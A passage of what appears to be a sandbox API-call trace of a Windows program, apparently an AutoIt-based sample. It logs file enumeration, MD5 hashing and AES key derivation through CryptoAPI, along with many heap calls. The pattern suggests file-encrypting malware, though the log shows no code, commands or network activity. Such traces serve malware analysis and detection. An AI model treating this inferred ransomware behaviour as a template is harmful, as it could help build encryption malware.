cFileName="4b9s3WH6aiuJAy85.m4a", cAlternateFileName="4B9S3W~1.M4A")) returned 0x90ae18 [0181.024] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0181.024] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.024] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.024] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.025] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.025] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0181.025] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.025] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0181.025] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.025] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.025] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0181.025] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.025] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.025] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.025] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.025] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.025] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0181.025] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.025] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0181.027] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.027] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.027] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0181.027] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.027] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.027] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.027] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.027] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.027] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.027] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.027] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.027] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.027] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.027] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.027] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.027] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0181.027] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.028] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.028] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.028] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.028] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0181.028] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.028] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.028] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.028] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.028] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.028] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.028] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.028] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.028] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.028] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.028] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0181.028] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.029] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.029] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.029] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.029] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0181.029] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.029] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.029] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.029] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.029] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0181.029] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.029] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.029] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.029] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.029] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.029] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.029] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.029] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0181.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0181.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0181.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0181.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0181.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0181.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0181.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0181.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0181.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0181.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0181.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0181.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0181.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0181.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0181.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0181.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0181.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0181.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.033] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0181.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0181.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0181.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0181.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0181.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0181.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0181.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0181.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0181.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0181.034] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0181.034] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0181.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0181.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.034] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0181.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0181.034] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0181.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0181.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0181.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0181.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd990 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0181.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0181.035] 